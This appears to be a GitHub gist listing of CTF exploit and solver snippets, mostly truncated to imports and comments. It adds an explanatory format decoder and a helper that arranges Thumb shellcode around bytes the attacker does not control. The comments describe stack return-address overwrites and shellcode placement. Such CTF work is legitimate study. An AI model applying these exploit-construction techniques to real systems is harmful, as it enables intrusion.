Bruno Keith bkth

@bkth
bkth / skybot_exploit.py
Last active March 26, 2017 22:27
exploit script for skybot (insomnihack ctf 2017)
#!/usr/bin/python
from pwn import *
import time
def recv_menu():
return s.recvuntil('>>> ')
@bkth
bkth / decode.py
Created July 9, 2017 09:10
kompreplicants tower of hanoi
# The encoding of each tree node is:
#   first 4 bits: the depth of the node in the tree
#   next 8 bits: the character stored in the node
#   next X bits: the position of the node in the tree, where X is the depth given by the first 4 bits
# The file has the following structure:
#   each tree node encoded as above, then 4 bits set to zero, then each original character
#   encoded by its position in the tree, then a few trailing bits at the end
bits = []
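The comments above describe the container format but not its bit conventions, so here is an added round-trip example (not code from bkth's gist) that encodes and decodes it under stated assumptions: bits are read MSB-first, a node's "position" is its path from the root with one bit per level (0 = left, 1 = right, so a depth-d node carries d position bits), a 4-bit depth of zero terminates the node list, and trailing bits that do not complete a codeword are padding. The codebooks and messages in the usage section are constructed sample input.

```python
def int_to_bits(value, width):
    """Big-endian list of `width` bits for `value`."""
    return [(value >> (width - 1 - i)) & 1 for i in range(width)]


def bits_to_int(bits):
    out = 0
    for b in bits:
        out = (out << 1) | b
    return out


def encode(message, codebook):
    """codebook maps a character to its path from the root, e.g. {'a': '0', 'b': '10'}.
    Layout: [depth(4) | char(8) | path(depth)] per node, 0000, message codewords, zero padding."""
    bits = []
    for ch, path in codebook.items():
        depth = len(path)
        if not 1 <= depth <= 15 or ord(ch) > 255:
            raise ValueError("depth must fit in 4 bits (1..15) and char in 8 bits")
        bits += int_to_bits(depth, 4)
        bits += int_to_bits(ord(ch), 8)
        bits += [int(c) for c in path]
    bits += [0, 0, 0, 0]                       # depth 0 = end of node list
    for ch in message:
        bits += [int(c) for c in codebook[ch]]
    while len(bits) % 8:                       # pad to a byte boundary (assumption)
        bits.append(0)
    return bytes(bits_to_int(bits[i:i + 8]) for i in range(0, len(bits), 8))


def _check_prefix_free(paths):
    """Reject a node table in which one codeword is a prefix of another; such a
    table makes decoding ambiguous. Sorted order puts a prefix before its extensions."""
    codes = sorted(paths)
    for i, a in enumerate(codes):
        for b in codes[i + 1:]:
            if b.startswith(a):
                raise ValueError("codeword %s is a prefix of %s" % (a, b))


def decode(blob, n_chars=None):
    """Rebuild the tree from the node list, then walk the message bits.
    The format stores no message length: with a complete prefix code, zero padding
    decodes as extra symbols, so pass n_chars when the receiver knows it.
    Without it, a trailing partial codeword is dropped as padding."""
    bits = []
    for byte in blob:
        bits += int_to_bits(byte, 8)
    pos = 0

    def take(n):
        nonlocal pos
        chunk = bits[pos:pos + n]
        if len(chunk) < n:
            raise ValueError("truncated input at bit %d" % pos)
        pos += n
        return chunk

    paths = {}
    while True:
        depth = bits_to_int(take(4))
        if depth == 0:
            break
        ch = chr(bits_to_int(take(8)))
        path = ''.join(str(b) for b in take(depth))
        paths[path] = ch
    _check_prefix_free(paths)

    out = []
    cur = ''
    while pos < len(bits) and (n_chars is None or len(out) < n_chars):
        cur += str(bits[pos])
        pos += 1
        if cur in paths:
            out.append(paths[cur])
            cur = ''
    return ''.join(out)


if __name__ == "__main__":
    # Constructed sample: a complete prefix code, so padding must be cut by length.
    book = {'a': '0', 'b': '10', 'c': '11'}
    blob = encode("abcab", book)
    print(decode(blob, n_chars=5))            # abcab
    print(decode(blob))                       # abcabaaa: the 3 zero pad bits read as 'a'
```

The second print shows the caveat a decoder for this format has to deal with: when the code is complete, the "few bits at the end" are indistinguishable from real symbols unless the message length is known, which is why `decode` accepts `n_chars`.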
@bkth
bkth / rhme3exploit.py
Created September 1, 2017 23:05
rhme3 exploit chall
import time
import telnetlib
import sys
import binascii
import struct
import socket
HOST = "127.0.0.1" if len(sys.argv) < 2 else sys.argv[1]
PORT = 1337 if len(sys.argv) < 3 else int(sys.argv[2])
TARGET = (HOST, PORT)
@bkth
bkth / ascii_art.py
Last active September 4, 2017 15:58
TW17 CTF
import time
import telnetlib
import sys
import binascii
import struct
import socket
# OOB access inside the ascii art table with \x7f lets us read the first 6 qwords of our input
# overwrite the return address on the stack so that ESP points to our buffer, which jumps to system@plt with the stack already set up
@bkth
bkth / sniper.py
Created September 21, 2017 00:14
pointers sniper
import time
import telnetlib
import sys
import binascii
import struct
import socket
def info(s):
print "[*] %s" % s
@bkth
bkth / doit.py
Last active October 3, 2017 21:11
securimag's new year challenge; due to an oversight from the author, the git repo was publicly exposed, so this is a dirty script to rebuild the trees and get the sources
import os
import subprocess
def run_cmd(s):
return subprocess.check_output(s.split())
@bkth
bkth / keybase.md
Created October 7, 2017 18:22
keybase.md

Keybase proof

I hereby claim:

  • I am bkth on github.
  • I am bkth (https://keybase.io/bkth) on keybase.
  • I have a public key ASBZHtze7NMvZErOr3XCmUGi5x41XbrfafPY4bJ7fVsfgAo

To claim this, I am signing this object:

@bkth
bkth / sakura.py
Created November 6, 2017 04:49
HITCON CTF 2017
from z3 import *
f = open("source.c", "rb")
lines = f.read().split("\n")
input_byte = []
@bkth
bkth / calculator_exploit.py
Last active November 11, 2017 12:42
exploit for bin 300 HITB AMS (calculator)
#!/usr/bin/python
# Exploit for the BIN 300 (calculator) challenge during HITB AMS CTF
# We control 4 bytes every 8 bytes
# As Thumb instructions are 2 bytes, we can make the processor switch instruction set and use a shellcode
# that does one instruction followed by a short branch to skip the next dword
from unicorn import *
from unicorn.arm_const import *
from keystone import *
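An added illustration (not code from the gist, and not using its unicorn/keystone setup) of the layout the comments above describe: each 4-byte controlled slot holds one 16-bit Thumb instruction followed by a `b.n` that jumps over the 4 bytes we do not control. The branch is hand-encoded from the Thumb T2 `B` format (`11100 imm11`, target = PC + 2*imm11 with PC = address + 4, so `0xE001` at address A lands at A + 6). The sample instructions (`movs r0-r2, #imm`), the filler dword standing in for the uncontrolled bytes, and the `trace` helper that follows only our own branches are constructed for the example.

```python
THUMB_NOP = b"\xc0\x46"   # mov r8, r8: the classic Thumb NOP, valid on every Thumb CPU


def thumb_branch(offset):
    """Encode Thumb 'b.n' (T2) for a byte offset relative to the branch's own address.
    target = PC + SignExtend(imm11:'0'), PC = addr + 4, so offset must be even
    and within [-2044, 2050]."""
    rel = offset - 4
    if rel % 2 or not -2048 <= rel <= 2046:
        raise ValueError("offset %d out of range for b.n" % offset)
    imm11 = (rel >> 1) & 0x7FF
    return (0xE000 | imm11).to_bytes(2, "little")


def interleave(instructions, filler=b"\x00\x00\x00\x00", controlled=4, stride=8):
    """Place 2-byte Thumb instructions so that only the first `controlled` bytes of
    every `stride` bytes are ours. Each slot ends with a b.n to the next slot; the
    last slot is padded with NOPs and carries no branch. `filler` stands in for the
    bytes the target writes into the uncontrolled region (assumption for the demo)."""
    if controlled % 2 or controlled < 4 or stride < controlled:
        raise ValueError("need an even controlled size >= 4 that fits in the stride")
    if len(filler) != stride - controlled:
        raise ValueError("filler must cover exactly the uncontrolled bytes")
    for ins in instructions:
        if len(ins) != 2:
            raise ValueError("only 16-bit Thumb instructions can be interleaved")
    per_slot = controlled // 2 - 1                     # instructions per slot, minus the branch
    skip = thumb_branch(stride - controlled + 2)       # from the branch to the next slot
    slots = [instructions[i:i + per_slot] for i in range(0, len(instructions), per_slot)]
    out = b""
    for n, chunk in enumerate(slots):
        slot = b"".join(chunk) + THUMB_NOP * (per_slot - len(chunk))
        if n == len(slots) - 1:
            out += slot + THUMB_NOP                    # nothing left to skip over
        else:
            out += slot + skip + filler
    return out


def trace(buf):
    """Follow the layout from offset 0, decoding only b.n, and return the
    (offset, halfword) pairs that would execute. If any offset falls in the
    uncontrolled region the chain is broken."""
    pc = 0
    executed = []
    while pc + 2 <= len(buf):
        hw = buf[pc:pc + 2]
        if hw[1] & 0xF8 == 0xE0:                       # top five bits 11100: b.n
            imm11 = int.from_bytes(hw, "little") & 0x7FF
            if imm11 & 0x400:
                imm11 -= 0x800
            pc = pc + 4 + imm11 * 2
            continue
        executed.append((pc, hw))
        pc += 2
    return executed


if __name__ == "__main__":
    # Constructed sample: movs r0,#1 / movs r1,#2 / movs r2,#3
    code = [b"\x01\x20", b"\x02\x21", b"\x03\x22"]
    buf = interleave(code, filler=b"\xde\xad\xbe\xef")
    print(buf.hex())
    for off, hw in trace(buf):
        print("%2d: %s%s" % (off, hw.hex(), "" if off % 8 < 4 else "  <-- uncontrolled!"))
```

The `trace` check is the part worth keeping around: run it on the final buffer before sending, and assert that every executed offset satisfies `off % stride < controlled`, so a miscounted slot cannot silently land the CPU in bytes the target overwrote.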
@bkth
bkth / grumpcheck.py
Created September 17, 2017 20:03
CSAW_2017_CTF (prophecy, grumpcheck, pilot, scv)
# the check function was originally written in Python and fed through Grumpy, a Python-to-Go transpiler written by Google (open sourced on GitHub)
# the main check function is roughly 2k+ lines, but Grumpy-generated code follows this general pattern:
# grumpy_Op()
# if error:
#     multiple lines of cleanup and bailout
# good path
# so we can go through it faster
# it first checks that our input contains 5 parts when split('-') is called
# then each part is checked to be 5 characters long
# then it does some basic checks on the parts, outlined below